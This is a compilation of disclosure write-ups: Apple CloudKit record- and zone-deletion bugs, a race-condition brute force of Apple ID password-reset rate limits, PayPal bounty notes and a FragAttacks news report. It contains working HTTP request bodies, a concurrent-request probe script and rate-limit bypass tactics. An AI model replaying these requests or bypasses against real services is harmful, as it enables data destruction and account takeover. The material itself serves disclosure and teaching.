With my iPad, I also verified by going to https://apple.news/TtVkjIR3aTPKrWAykey3ANA that I could see my channel in the Apple News app. I then tried all the methods that were possible against records using records/modify, based on the CloudKit documentation: create, update, forceUpdate, replace, forceReplace, delete and forceDelete. On all methods, the response looked like this:

{ "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "reason" :"Operation not permitted", "serverErrorCode" :"ACCESS_DENIED" } ] }

But, on forceDelete:

POST /database/1/com.apple.news.public/production/public/records/modify?clientBuildNumber=2102Hotfix38&clientMasteringNumber=2102Hotfix38 HTTP/1.1
Host: p55-ckdatabasews.icloud.com
Cookie: ...
{ "numbersAsStrings":true, "operations": [ { "record": { "recordType":"Article", "recordChangeTag": "ok", "recordName":"TtVkjIR3aTPKrWAykey3ANA" }, "operationType":"forceDelete" } ], "zoneID": { "zoneName":"_defaultZone" } } The response said: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "deleted" :true } ] } I reloaded the channel in Apple News: This confirmed to me that I could delete any channel or article, including stock entries, in the container com.apple.news.public being used for the Stock and Apple News iOS-apps. This worked due to the fact that I could make authenticated calls to CloudKit from the API being used for the Notes-app on www.icloud.com and due to a misconfiguration of the records added in the com.apple.news.public-container. I made a proof of concept to Apple and sent it as a different report on the 17th of March. Apple’s response Apple replied with a fix in place on the 19th of March by modifying the permissions of the records added to com.apple.news.public, where even the forceDelete-call would respond with: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "reason" :"delete operation not allowed", "serverErrorCode" :"ACCESS_DENIED" } ] } I also notified Apple about more of their own containers still having the ability to delete content from, however, it wasn’t clear if those containers were actually using the Public scope at all. Shortcuts Another app that was using the Public scope of CloudKit was Shortcuts. With Apple Shortcuts you can create logical flows that can be launched automatically or manually which then triggers different actions across your apps on iOS-devices. These shortcuts can be shared with other people using iCloud-links which creates an ecosystem around them. There are websites dedicated to recommending and sharing these Shortcuts through iCloud-links. As mentioned above, there is a Shared scope in a CloudKit container. When you decide to share anything private, this scope is often used. You would get something called a Short GUID, that looks something like 0H1FzBMaF1yAC7qe8B2OIOCxx and it would be possible to access using https://www.icloud.com/share/[shortGUID]. However, Apple Shortcuts links works a bit differently. When you share a shortcut, a record with the record type SharedShortcut will be created in the Public scope. The Record name being used will then be formed as a GUID: EA15DF64-62FD-4733-A115-452A6D1D6AAF, the record name will then be formatted to a lowercase string without hyphens and end up as: https://www.icloud.com/shortcuts/ea15df6462fd4733a115452a6d1d6aaf which will be the URL you would share publicly. Accessing this URL would then make a call to: https://www.icloud.com/shortcuts/api/records/ea15df6462fd4733a115452a6d1d6aaf which would return the data from CloudKit: { "recordType":"SharedShortcut", "created": { "userRecordName":"_264f90fe4d6310292cb22dad934baed0", "deviceID":"9AB...", "timestamp":1540330094701 }, "recordChangeTag":"jnm8rnmw", "pluginFields": {}, "deleted":false, "recordName":"EA15DF64-62FD-4733-A115-452A6D1D6AAF", "modified": { "userRecordName":"_264f90fe4d6310292cb22dad934baed0", "deviceID":"9AB...", "timestamp":1540330094701 }, "fields": { "icon_glyph": { "type":"NUMBER_INT64", "value":59412 }, "icon": { "type":"ASSETID", "value": { "downloadURL":"..." This made me excited since I could already see a few attack scenarios. If I could modify other users’ shortcuts, that would be really bad. 
The same kind of issue as on Apple News, being able to delete someone else's shortcut, would also not be great. The Public scope also contained the Shortcuts Gallery shown in the app itself, so if that content could be modified, that would be quite critical.

The Shortcuts app itself used the protobuf API at gateway.icloud.com:

POST /ckdatabase/api/client/record/save HTTP/1.1
Host: gateway.icloud.com
X-CloudKit-ContainerId: com.apple.shortcuts
X-CloudKit-BundleId: com.apple.shortcuts
X-CloudKit-DatabaseScope: Public
Content-Type: application/x-protobuf; desc="https://p33-ckdatabase.icloud.com:443/static/protobuf/CloudDB/CloudDBClient.desc"; messageType=RequestOperation; delimited=true
User-Agent: CloudKit/962 (18B92)
X-CloudKit-AuthToken: [MY-TOKEN]

Since I had spent so much time modifying InflatableDonkey to try all methods, I could now also use the X-CloudKit-AuthToken from my interception to try to make authorized calls that modify records in the Public scope. However, all the methods that actually did modifications gave me permission errors:

"CREATE operation not permitted* ck1w5bmtg"

This made me realize that, through the API at gateway.icloud.com, my X-CloudKit-AuthToken did not allow me to modify any records in the Public scope. I spent almost 5-6 hours trying to find any methods that did not give me permission errors, but without any luck.

Since I had already reported the Apple News bugs and Apple had already fixed those issues, I tried the same API connection method I initially took from Notes on www.icloud.com:

POST /database/1/com.apple.shortcuts/production/public/records HTTP/1.1
Host: p55-ckdatabasews.icloud.com

That also failed: the container com.apple.shortcuts was not accessible with the authentication being used from www.icloud.com.

But remember that I mentioned different APIs talked with CloudKit differently? I went to icloud.developer.apple.com and connected to my own container, took one of the requests and modified the container to com.apple.shortcuts:

POST /r/v4/user/com.apple.shortcuts/Production/public/records/modify?team_id=9DCADDBE3F
Host: p25-ckdatabasews.icloud.apple.com

This worked! I could verify it by using records/lookup with one of the UUIDs from the protobuf content, pointing at one of the gallery banners from the iOS app:

POST /r/v4/user/com.apple.shortcuts/Production/public/records/lookup?team_id=9DCADDBE3F HTTP/1.1
Host: p25-ckdatabasews.icloud.apple.com
Cookie: [MY COOKIES]

{ "records": [ { "recordName": "C377CA6A-07D3-4A8A-A85E-3ED27EE9592E" } ], "numbersAsStrings": true, "zoneID": { "zoneName": "_defaultZone" } }

This gave me:

{ "records" : [ { "recordName" :"C377CA6A-07D3-4A8A-A85E-3ED27EE9592E", "recordType" :"GalleryBanner", "fields" : { "iphone3xImage" : { "value" : { ...

Perfect! This was now my way to talk with the Shortcuts database: the CloudKit connection from the Developer portal allowed me to properly authenticate to the com.apple.shortcuts container. I could now start checking the permissions of the public records. The simplest way to do this was to add a Burp replace rule, replacing my own container, iCloud.com.mycontainer.test, with the Shortcuts container com.apple.shortcuts in any request data.

When writing stories of how bugs were found, it's extremely hard to communicate how much time things take, and how many attempts were needed to figure things out. And often, the explanation of what actually worked seems really obvious when presented afterwards.
I started going through the endpoints from the CloudKit documentation, as well as clicking around in the UX of the CloudKit Developer portal. Records in the public scope were not possible to modify or delete. Some of the record types I found in the public scope were indexable, which allowed you to query them as lists; however, this was all public info anyway. For example, you could use records/query to get all gallery banners:

{ "query": { "recordType":"GalleryBanner", "sortBy": [] }, "zoneID": { "zoneName":"_defaultZone" } }

But that was not an issue, since they were already listed in the app. I looked into subscriptions, which did not really work as expected in the public scope. I looked at the sharing options, but since Shortcuts did not use Short GUID sharing, that was not really interesting either.

(Z)one more thing…

Zones were the last thing I tested. As I mentioned earlier, each scope has zones, and the default zone is called _defaultZone. What is interesting with the Public scope is that the UX of the CloudKit Developer portal actually tells you that it doesn't support adding new zones. However, when I made the call to com.apple.shortcuts to list all zones, I could see that they had indeed more zones in the Public scope than just the default one. I could also add new zones:

POST /r/v4/user/com.apple.shortcuts/Production/public/zones/modify?team_id=9DCADDBE3F HTTP/1.1
Host: p25-ckdatabasews.icloud.apple.com

{ "operations": [ { "purge":true, "zone": { "atomic":true, "zoneID": { "zoneName":"test" } }, "operationType":"create" } ] }

which responded with:

{ "zones": [ { "syncToken":"AQAAAAAAAAABf/////////+AfEbbUd5SC7kEWsQavq+k", "atomic":true, "zoneID": { "zoneType":"REGULAR_CUSTOM_ZONE", "zoneName":"test", "ownerRecordName":"_e059f5dc..." } } ] }

but I could not see anything bad with it. I could delete my own zones, but that was about it. Those zones would never be used or interacted with by anyone else. The documentation for zones was limited: there were no other calls than create or delete. I could create a zone, but was there really any impact to this? I wasn't sure.

I signed in to the CloudKit Developer portal with my second Apple ID and tried the same calls against my first user's container:

{ "zones" : [ { "zoneID" : { "zoneName" :"_defaultZone", "zoneType" :"DEFAULT_ZONE" }, "reason" :"Cannot delete all records from public default zone", "serverErrorCode" :"BAD_REQUEST" } ] }

So deletion failed when I tried it as a different user against my own container, as expected. It wasn't possible to delete any container's default zone. Could I do a delete call without actually deleting anything, but confirming it in some other way? I did not see a way to do that. My assumption was that a deletion attempt would result in the error above. I decided to try deleting the metadata_zone:

{ "operations": [ { "purge":true, "zone": { "atomic":true, "zoneID": { "zoneType":"REGULAR_CUSTOM_ZONE", "zoneName":"metadata_zone" } }, "operationType":"delete" } ] }

It replied with an error:

{ "zones" : [ { "zoneID" : { "zoneName" :"metadata_zone", "ownerRecordName" :"_2e80...", "zoneType" :"REGULAR_CUSTOM_ZONE" }, "reason" :"User updates to system zones are not allowed", "serverErrorCode" :"NOT_SUPPORTED_BY_ZONE" } ] }

This made me sure that the creation of zones wasn't really an issue. The delete call did not work on existing ones, and there was no impact in being able to create new ones.
I also tried the delete call on _defaultZone, since I was sure that the error I would see would be the one above: Cannot delete all records from public default zone. At 23 Mar 2021 20:35:46 GMT I made the following call:

POST /r/v4/user/com.apple.shortcuts/Production/public/zones/modify?team_id=9DCADDBE3F HTTP/1.1
Host: p25-ckdatabasews.icloud.apple.com

{ "operations": [ { "purge": true, "zone": { "atomic": true, "zoneID": { "zoneName": "_defaultZone" } }, "operationType": "delete" } ] }

It responded with:

{ "zones" : [ { "zoneID" : { "zoneName" : "_defaultZone", "zoneType" : "DEFAULT_ZONE" }, "deleted" : true } ] }

Shit. I did a zones/list again:

{ "zones" : [ { "zoneID" : { "zoneName" : "_defaultZone", "ownerRecordName" : "_2e805...", "zoneType" : "DEFAULT_ZONE" }, "atomic" : true }, { "zoneID" : { "zoneName" : "metadata_zone", "ownerRecordName" : "_2e805...", "zoneType" : "REGULAR_CUSTOM_ZONE" }, "atomic" : true } ] }

Good, it wasn't really deleted. I figured I had tested it all and started to look into other things related to Apple Shortcuts. Suddenly, one of my shared shortcuts gave a 404. But I had just shared it? I quit the Shortcuts app and started it again. Shit. I went to one of the websites sharing a bunch of shortcuts and used my phone to test one: all of them were gone. I now realized that the deletion did somehow work, even though the _defaultZone never disappeared. When I tried sharing a new shortcut it also did not work, at least not to begin with, most likely due to the record types also being deleted.

At 23 Mar 2021 20:44:00 GMT I wrote an email to Apple Security. I explained the situation and confirmed I understood the severity. I also explained the steps I had taken to avoid causing any service interruption, since I knew that was against the Apple Security Bounty policy. I explained that creation of zones was indeed possible, but that I did not know whether that also confirmed that I could delete zones. Another reason this bug was hard to find was that the container made by my other Apple developer account wasn't vulnerable. Also, the error when trying to delete metadata_zone confirmed that there were indeed permission checks in place. The bug seemed to only allow the _defaultZone to be deleted, by anyone, on Apple-owned CloudKit containers.

I decided to use the case of "I am able to create a zone" as an indicator that this bug existed in other containers owned by Apple. This would show Apple the scope of the issue without me causing any more harm. I was already panicking. Apart from com.apple.shortcuts, the list consisted of 30 more containers with the same issue. I still wasn't sure whether creating a new zone in the public scope actually proved the ability to delete the default zone, but that was the closest I got to verifying the issue. Also, the other containers might not have been using the public scope at all, and I never confirmed the bug on the other scopes. Apple's first response came early the morning after.

Public response

I acknowledged the email and started to see on Twitter that this was in fact affecting a lot of people. There were also some suspicions that this was a deliberate move by Apple, due to a podcast discussion about using the API to fetch Shortcuts data. A podcast called "Connected" discussed the issue and tried to explain what had happened (between 26:50 and 40:22).
One individual was actually 100% correct in identifying the minute of my accidental deletion call.

Apple's response

Apple was quite silent after their first request to me to stop testing. They did go public and explain to people that the issue was going to be solved. It took a few days for all data to recover; one other individual shared my assumption on why that was. On April 1st Apple gave their reply. During the hold-out period, I followed up on their email again, clarifying the steps I had taken to prevent any service interruption, and tried to explain how limited my options were to confirm whether the deletion call had worked or not. I also asked them if the creation of a zone was a good indicator of the bug. I got back another response clarifying that creation of a zone was indeed a valid, non-destructive way to confirm invalid security controls. I then confirmed that I could not do any of the zone modifications anymore. The CloudKit Developer portal was later moved to use the API on api.apple-cloudkit.com instead.

Conclusion

Approaching CloudKit for bugs turned out to be a lot of fun, a bit scary, and a really good example of what a real deep dive into one technology can result in when hunting bugs. The Apple Security team was incredibly helpful and professional throughout the process of reporting these issues. Even though the last bug caused an incident, I really tried to explain all the steps I took to prevent that from happening.

The Apple Security Bounty program decided to award $12,000, $24,000 and $28,000, respectively, for the bugs mentioned in this post.

Source: https://labs.detectify.com/2021/09/13/hacking-cloudkit-how-i-accidentally-deleted-your-apple-shortcuts/
8. This article is about how I found a vulnerability in Apple's forgot-password endpoint that allowed me to take over an iCloud account. The vulnerability has been completely patched by the Apple security team and no longer works. The Apple Security Team rewarded me $18,000 USD as part of their bounty program, but I refused to receive it. Please read the article to know why I refused the bounty.

After my Instagram account takeover vulnerability, I realized that many other services are vulnerable to race-hazard-based brute forcing. So I kept reporting the same issue to the affected service providers, like Microsoft, Apple and a few others. Many people mistook this vulnerability for a typical brute-force attack, but it isn't: here we send multiple concurrent requests to the server to exploit a race condition present in the rate limits, making it possible to bypass them. Now let's see what I found in Apple.

The forgot-password option of Apple ID allows us to change our password using a 6 digit OTP sent to our mobile number and email address respectively. Once we enter the correct OTP, we are able to change the password.

[Screenshot: Apple forgot password page prompting to enter a mobile number after entering the email address]

For security reasons, Apple prompts us to enter the trusted phone number along with the email address to request an OTP. So to exploit this vulnerability, we need to know the trusted phone number as well as the email address to request the OTP, and we would have to try all the possibilities of the 6 digit code, which is around 1 million attempts (10^6).

As far as my testing went, the forgot-password endpoint had pretty strong rate limits. If we make more than 5 attempts, the account is locked for the next few hours; even rotating the IP didn't help.

[Screenshot: HTTP POST request sent to the forgot-password endpoint and its response]

Then I tried race-hazard-based brute forcing by sending simultaneous POST requests to the Apple server, and found a few more limitations. To my surprise, Apple has rate limits for concurrent POST requests from a single IP address, not just on the forgot-password endpoint but across the entire Apple server. We cannot send more than 6 concurrent POST requests; they are dropped. And not just dropped: our IP address gets blacklisted for future POST requests with a 503 error. Oh my god! That is too much 🤯 So I thought they weren't vulnerable to this type of attack 😔 but I still had some hope, since these are generic rate limits across the server and not specific to the code-validation endpoint. After some testing, I found a few things:

iforgot.apple.com resolves to 6 IP addresses across the globe – (17.141.5.112, 17.32.194.36, 17.151.240.33, 17.151.240.1, 17.32.194.5, 17.111.105.243).

There are the two rate limits we have seen above: one is triggered when we send more than 5 requests to the forgot-password endpoint (http://iforgot.apple.com/password/verify/smscode), and another one is across the Apple server when we send more than 6 concurrent POST requests.

Both rate limits are specific to an Apple server IP, which means we can still send requests (within limits, though) to another Apple server IP.

We can send up to 6 concurrent requests to one Apple server IP (by binding iforgot.apple.com to that IP) from a single client IP address, as per their limits. There are 6 Apple IP addresses resolved, as mentioned above. So we can send up to 36 requests across the 6 Apple IP addresses (6 x 6 = 36) from a single IP address.
Therefore, an attacker would require about 28K IP addresses to send up to 1 million requests and successfully verify the 6 digit code. 28K IP addresses sounds easy if you use cloud service providers, but here comes the hardest part: the Apple server behaves strangely when we try to send POST requests from cloud service providers like AWS, Google Cloud, etc.

[Screenshot: response to any POST request sent from AWS & Google Cloud]

They reject the POST request with 502 Bad Gateway without even checking the request URI or body. I tried changing IPs, but all of them returned the same response code, which means they have blacklisted the entire ASNs of some cloud service providers, if I'm not wrong 🙄 It makes the attack harder for those who rely on reputed cloud services like AWS. I kept trying various providers and finally found a few whose network IPs are not blacklisted. Then I sent multiple concurrent POST requests from different IP addresses to verify the bypass.

And it worked!!! 🎉🎉🎉 Now I could change the password of any Apple ID with just the trusted phone number 😇

Of course the attack isn't easy to do; we need a proper setup to successfully exploit this vulnerability. First we need to bypass the SMS 6 digit code, then the 6 digit code received at the email address. Both bypasses are based on the same method and environment, so we need not change anything while trying the second bypass. Even if the user has two-factor authentication enabled, we would still be able to access their account, because the 2FA endpoint shares the same rate limits and was also vulnerable. The same vulnerability was also present in the password-validation endpoint.

I reported this information with detailed reproduction steps and a video demonstrating the bypass to the Apple security team on July 1st, 2020. The Apple security team acknowledged and triaged the issue within a few minutes of the report. I didn't get any updates from Apple after triage, so I kept following up for status updates, and on Sep 9th, 2020 they said they were working on a fix. Again, no updates for the next 5 months, and then, when I asked for status, an email came saying they were planning to address the issue in an upcoming security update. I was wondering what was taking them so long to react to a critical vulnerability, so instead of relying on them I kept retesting the vulnerability to see whether it was fixed. I tested on April 1st, 2021 and realized a patch for the vulnerability had been released to production, but there were still no updates from Apple. I asked them whether the issue was patched, and the response was the same: they had no status updates to share. I waited patiently for them to update the status. After a month, I wrote to them that the issue had been patched on April 1st itself and asked why I was not being updated about it; I also told them I wanted to publish the report on my blog. The Apple security team asked me whether it was possible to share a draft of the article with them before publishing. That is when things started to go in an unexpected direction.

After sharing the draft, they denied my claim, saying that this vulnerability does not allow taking over the majority of iCloud accounts. As could be seen in their email, their analysis concluded that it only works against iCloud accounts that have not been used on passcode- or password-protected Apple devices.
I argued that even if the device passcode (4 digit or 6 digit) is asked for instead of the 6 digit code sent to email, it still shares the same rate limits and would be vulnerable to race-condition-based brute-forcing attacks. We would also be able to discover the passcode of the associated Apple device. I also noticed a few changes in their support page regarding forgot password (link: https://support.apple.com/en-in/HT201487). That is how the page looks now, but it wasn't the same before my report. In October 2020 the page looked different; link from the web archive: http://web.archive.org/web/20201005172245/https://support.apple.com/en-in/HT201487

"In some cases" was prefixed to the paragraph in October 2020, which is exactly after I was told in September 2020 that they were working on a fix. It looks like everything was planned: the page was updated to support their claim that only a limited set of users was vulnerable. That page hadn't been updated for years, yet it got a minor update right after my report. It doesn't look like a coincidence. When I asked about it, they said the updates were made due to changes in iOS 14. What does resetting a password using a trusted email / phone number have to do with iOS 14, I asked. If that is true, weren't trusted phone numbers and emails used to reset the password before iOS 14? If that's the case, my report is applicable to all Apple accounts. I didn't get any answer from them. I was disappointed and told them that I was going to publish the blog post with all the details without waiting for their approval.

In reply, they arranged a call with Apple engineers to explain what they had found in their analysis and to answer any questions I might have. During the call, I asked why it is different from the vulnerability I found. They said that the passcode is not sent to any server endpoint and is verified on the device itself. I argued that there is no way for a random Apple device to know another device's passcode without contacting the Apple server. They said it is true that the data is sent to the server, but it is verified using a cryptographic operation, and they could not reveal more than that due to security concerns. I asked: what if we figure out the encryption process through reverse engineering, replicate it, and brute force the Apple server with concurrent requests? I didn't get any definite answer to that question. They concluded that the only way to brute force the passcode is by brute forcing the Apple device itself, which is not possible due to the local system's rate limits.

I couldn't accept what the Apple engineers said: logically, it should be possible to replicate what an Apple device does when sending the passcode data to the server. I decided to verify it myself to prove them wrong. After a few hours of testing, I found that they have SSL pinning specific to the passcode-validation endpoint, so the traffic sent to the server cannot be read by a MITM proxy like Burp / Charles. Thanks to checkra1n and SSL Kill Switch, I was able to bypass the pinning and read the traffic sent to the server. I figured out that Apple uses SRP (Secure Remote Password), a PAKE protocol, to verify that the user knows the right passcode without actually sending it to the server. So what the engineers said is right: they aren't sending the passcode directly to the server.
Instead, both server and client do some mathematical calculations using previously known data to arrive at a key (much like a Diffie-Hellman key exchange). Without getting into the specifics of SRP, let me get straight to what is necessary in our context:

The Apple server has two stored values, namely a verifier and a salt, specific to each user, created at the time of setting or updating the passcode.

Whenever a user initiates an SRP authentication with a username and an ephemeral value A, the Apple server responds with the salt of the specific user and an ephemeral value B.

The client uses the salt obtained from the server to calculate the key prescribed by SRP-6a. The server uses the salt and the verifier to calculate the key prescribed by SRP-6a.

Finally, they both prove to each other that the derived keys are the same. Read more about the detailed calculations of SRP-6a here.

SRP is known to prevent brute-force attacks, as it has a user-specific salt and a verifier, so even if someone steals the database, they still need to perform a CPU-intensive brute force for each user to discover the passwords one by one. That gives the affected vendor enough time to react. But in our case, we don't have to brute force a large number of accounts: brute forcing a single user is enough to get into their iCloud account as well as to find their passcode.

Brute forcing is possible only when you have both the salt and the verifier specific to the target user. After bypassing the SMS code we can easily impersonate the target user and obtain the salt. The problem here is the verifier. We have to either somehow obtain the verifier from the server, or bypass the rate limit on the key-verifying endpoint. If the rate limit is bypassed, we can keep trying different keys, derived from precomputed passcode values, until we arrive at the matching key. Obviously, it requires a lot of computation to derive a key for each 4 or 6 digit numeric passcode (from 0000/000000 to 9999/999999).

When we enter the passcode on an iPhone / iPad during password reset, the device initiates SRP authentication by sending the user session token obtained from the successful SMS verification. The server responds with the salt of the respective user. The passcode and the salt are hashed to derive the final key, which is sent to https://p50-escrowproxy.icloud.com/escrowproxy/api/recover to check whether it matches the key computed (using the ephemeral, the salt and the verifier) on the server. The POST request sent to verify the key carried all the data mentioned above, but in DATA BLOB format.

The first thing I wanted to check was the rate limit, before even decoding the values of the BLOB. I sent the request 30 times concurrently to check whether the endpoint was vulnerable. To my shock, it wasn't: out of 30 requests, 29 were rejected with an internal server error. The rate limiting could be performed in the Apple server itself or in an HSM (hardware security module); either way, the rate-limit logic there appears to be implemented so as to prevent the race hazard. There is a very bleak chance that this endpoint was not vulnerable to the race hazard before my report, because all the other endpoints I tested were vulnerable – SMS code validation, email code validation, two-factor authentication and password validation were all vulnerable. If they did patch it after my report, the vulnerability was a lot more severe than I initially thought.
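As a rough illustration of the concurrency probes used throughout this research, here is a minimal sketch (Node 18+, JavaScript) that fires a batch of simultaneous POST requests and tallies the response codes. The URL and payload are placeholders, and a real test would need tighter synchronization (for example, holding back the last byte of each request), but the idea is the same: if the rate limit is enforced atomically, almost everything is rejected, as in the 29-out-of-30 result above; if it is racy, noticeably more requests slip through:

// Minimal race-hazard probe sketch. TARGET and the body are placeholders.
const TARGET = "https://example.com/verify"; // hypothetical rate-limited endpoint
const ATTEMPTS = 30;

async function probe() {
  const inFlight = Array.from({ length: ATTEMPTS }, (_, i) =>
    fetch(TARGET, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ code: String(i).padStart(6, "0") }),
    })
      .then((res) => res.status)
      .catch(() => "network-error")
  );

  // All requests are dispatched back-to-back, then awaited together.
  const statuses = await Promise.all(inFlight);
  const counts = {};
  for (const s of statuses) counts[s] = (counts[s] || 0) + 1;
  console.log(counts); // e.g. { "200": 1, "500": 29 } on an atomic rate limit
}

probe();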
By brute forcing the passcode, we would be able to identify the correct passcode by differentiating the responses. So we could not only take over any iCloud account but also discover the passcode of the Apple device associated with it. Even though the attack is complex, this vulnerability could be used to hack any iPhone / iPad that has a 4 digit / 6 digit numeric passcode, if my assumption is right. Since the endpoint now validates concurrent requests properly, there is no way for me to verify my claim; the only way I can confirm this is by writing to Apple, but they aren't giving any response in this regard.

I got the bounty email from Apple on June 4th, 2021. The actual bounty listed for iCloud account takeover on Apple's website is $100,000 USD. Extracting sensitive data from a locked Apple device is $250,000 USD. My report covered both scenarios (assuming the passcode endpoint was patched after my report), so the actual bounty should be $350,000. Even if they chose to award only the higher-impact of the two cases, it should still be $250,000 USD. Selling these kinds of vulnerabilities to government agencies or private bounty programs like Zerodium could have made a lot more money. But I chose the ethical way, and I didn't expect anything more than the bounty amounts outlined by Apple.

https://developer.apple.com/security-bounty/payouts/

But $18,000 USD is not even close to the actual bounty. Let's say all my assumptions are wrong and the Apple passcode-verifying endpoint wasn't vulnerable before my report. Even then, the given bounty is not fair, looking at the impact of the vulnerability as given below:

Bypassed two-factor authentication. It is literally as if 2FA doesn't exist, due to the bypass. Everyone relying on 2FA is vulnerable. This by itself is a major vulnerability.

Bypassed the password-validation rate limits. All Apple ID accounts that use common / weak / leaked passwords are vulnerable, even if they have two-factor authentication enabled. Once hacked, the attacker can track the location of the device as well as wipe it remotely. The 2014 celebrity iCloud hack happened largely because of weak passwords.

Bypassed the SMS verification, if we know the passcode or password of the device associated with the iCloud account. Say any of your friends or relatives knows your device passcode: using this vulnerability, they could take over your iCloud account and also erase your entire device remotely over the internet, without physical access to it.

We can take over all Apple IDs that are not associated with a passcode-protected Apple device, due to both the SMS and email verification code bypasses. That means:

Any Apple device without a passcode or password, i.e. anyone who turned off or never set the passcode / password.

Any Apple ID created without an Apple device (in a browser or in an Android app) that has never been used on a password-protected Apple device. For example, 50 million+ Android users have downloaded the Apple Music app, and the majority of them may never have used Apple devices. They are still Apple users, and their information (credit cards, billing address, subscription details, etc.) could be exposed.

They need not award the upper cap for iCloud account takeover ($100K), but it should at least be close to it, considering the impact. After all my hard work and almost a year of waiting, I didn't get what I deserved because of Apple's unfair judgement. So I refused to receive the bounty and told them it is unfair.
I asked them to reconsider the bounty decision or let me publish the report with all the information. There wasn't any response to my emails, so I decided to publish my article without waiting indefinitely for their response. Therefore, I shared my research with Apple FREE of cost, instead of for an unfair price. I request the Apple security team to be more transparent and fair, at least in the future.

I would like to thank Apple for patching the vulnerability. I repeat: the vulnerability is completely fixed, and the scenarios described above no longer work.

Thank you for reading the article! Please let me know your thoughts in the comments.

Source: https://thezerohack.com/apple-vulnerability-bug-bounty
9. Venmo
Xoom
Braintree Payments
Swift Financial / LoanBuilder
Hyperwallet

These are in scope in their bug bounty program.
10. Honestly, I'm satisfied with how much I received. Compared to others, what more can I say. 😅
11. A vulnerability I discovered in https://www.xoom.com/. The application is owned by PayPal. It's an older issue. Reward: $5,300
12. Three design and multiple implementation flaws have been disclosed in the IEEE 802.11 technical standard that undergirds Wi-Fi, potentially enabling an adversary to take control of a system and plunder confidential data. Called FragAttacks (short for FRagmentation and AGgregation attacks), the weaknesses impact all Wi-Fi security protocols, from Wired Equivalent Privacy (WEP) all the way to Wi-Fi Protected Access 3 (WPA3), thus virtually putting almost every wireless-enabled device at risk of attack.

"An adversary that is within radio range of a victim can abuse these vulnerabilities to steal user information or attack devices," Mathy Vanhoef, a security academic at New York University Abu Dhabi, said. "Experiments indicate that every Wi-Fi product is affected by at least one vulnerability and that most products are affected by several vulnerabilities."

IEEE 802.11 provides the basis for all modern devices using the Wi-Fi family of network protocols, allowing laptops, tablets, printers, smartphones, smart speakers, and other devices to communicate with each other and access the Internet via a wireless router. Introduced in January 2018, WPA3 is a third-generation security protocol that's at the heart of most Wi-Fi devices, with several enhancements such as robust authentication and increased cryptographic strength to safeguard wireless computer networks.

According to Vanhoef, the issues stem from "widespread" programming mistakes encoded in the implementation of the standard, with some flaws dating all the way back to 1997. The vulnerabilities have to do with the way the standard fragments and aggregates frames, allowing threat actors to inject arbitrary packets and trick a victim into using a malicious DNS server, or forge the frames to siphon data.

The list of 12 flaws is as follows —

CVE-2020-24588: Accepting non-SPP A-MSDU frames
CVE-2020-24587: Reassembling fragments encrypted under different keys
CVE-2020-24586: Not clearing fragments from memory when (re)connecting to a network
CVE-2020-26145: Accepting plaintext broadcast fragments as full frames (in an encrypted network)
CVE-2020-26144: Accepting plaintext A-MSDU frames that start with an RFC1042 header with EtherType EAPOL (in an encrypted network)
CVE-2020-26140: Accepting plaintext data frames in a protected network
CVE-2020-26143: Accepting fragmented plaintext data frames in a protected network
CVE-2020-26139: Forwarding EAPOL frames even though the sender is not yet authenticated
CVE-2020-26146: Reassembling encrypted fragments with non-consecutive packet numbers
CVE-2020-26147: Reassembling mixed encrypted/plaintext fragments
CVE-2020-26142: Processing fragmented frames as full frames
CVE-2020-26141: Not verifying the TKIP MIC of fragmented frames

A bad actor can leverage these flaws to inject arbitrary network packets, intercept and exfiltrate user data, launch denial-of-service attacks, and even possibly decrypt packets in WPA or WPA2 networks. "If network packets can be injected towards a client, this can be abused to trick the client into using a malicious DNS server," Vanhoef explained in an accompanying research paper. "If network packets can be injected towards an [access point], the adversary can abuse this to bypass the NAT/firewall and directly connect to any device in the local network."

In a hypothetical attack scenario, these vulnerabilities can be exploited as a stepping stone to launch advanced attacks, permitting an attacker to take over an outdated Windows 7 machine inside a local network.
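To make the aggregation flaw (CVE-2020-24588) a bit more tangible: the flag that marks a frame as an aggregated A-MSDU is not authenticated, so an attacker can flip it and have the receiver reinterpret an ordinary payload as a train of A-MSDU subframes. The toy JavaScript parser below (a sketch of the frame layout only, not an exploit) shows how the very same bytes take on a completely different structure once that flag is set:

// Toy A-MSDU subframe parser. Each subframe is:
//   destination MAC (6) | source MAC (6) | length (2, big-endian) | payload,
// padded to a 4-byte boundary (except for the last subframe).
function parseAmsdu(bytes) {
  const subframes = [];
  let off = 0;
  while (off + 14 <= bytes.length) {
    const len = (bytes[off + 12] << 8) | bytes[off + 13];
    if (off + 14 + len > bytes.length) break; // truncated subframe, stop
    subframes.push({
      da: bytes.slice(off, off + 6),
      sa: bytes.slice(off + 6, off + 12),
      payload: bytes.slice(off + 14, off + 14 + len),
    });
    off += 14 + len;
    off += (4 - (off % 4)) % 4; // skip inter-subframe padding
  }
  return subframes;
}

// When the unauthenticated "aggregated" flag is flipped on a normal frame, the
// first 14 bytes of what used to be the packet become a subframe header, which
// is what lets an attacker smuggle in packets they partially control.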
But on a brighter note, the design flaws are hard to exploit as they require user interaction or are only possible when using uncommon network settings. The findings have been shared with the Wi-Fi Alliance, following which firmware updates were prepared during a 9-month-long coordinated disclosure period. Microsoft, for its part, released fixes for some of the flaws (CVE-2020-24587, CVE-2020-24588, and CVE-2020-26144) as part of its Patch Tuesday update for May 2021. Vanhoef said an updated Linux kernel is in the works for actively supported distributions. This is not the first time Vanhoef has demonstrated severe flaws in the Wi-Fi standard. In 2017, the researcher disclosed what's called KRACKs (Key Reinstallation AttACKs) in WPA2 protocol, enabling an attacker to read sensitive information and steal credit card numbers, passwords, messages, and other data. "Interestingly, our aggregation attack could have been avoided if devices had implemented optional security improvements earlier," Vanhoef concluded. "This highlights the importance of deploying security improvements before practical attacks are known. The two fragmentation based design flaws were, at a high level, caused by not adequately separating different security contexts. From this we learn that properly separating security contexts is an important principle to take into account when designing protocols." Mitigations for FragAttacks from other companies like Cisco, HPE/Aruba Networks, Juniper Networks, and Sierra Wireless can be accessed in the advisory released by the Industry Consortium for Advancement of Security on the Internet (ICASI). "There is no evidence of the vulnerabilities being used against Wi-Fi users maliciously, and these issues are mitigated through routine device updates that enable detection of suspect transmissions or improve adherence to recommended security implementation practices," the Wi-Fi Alliance said. Source: https://thehackernews.com/2021/05/nearly-all-wifi-devices-are-vulnerable.html
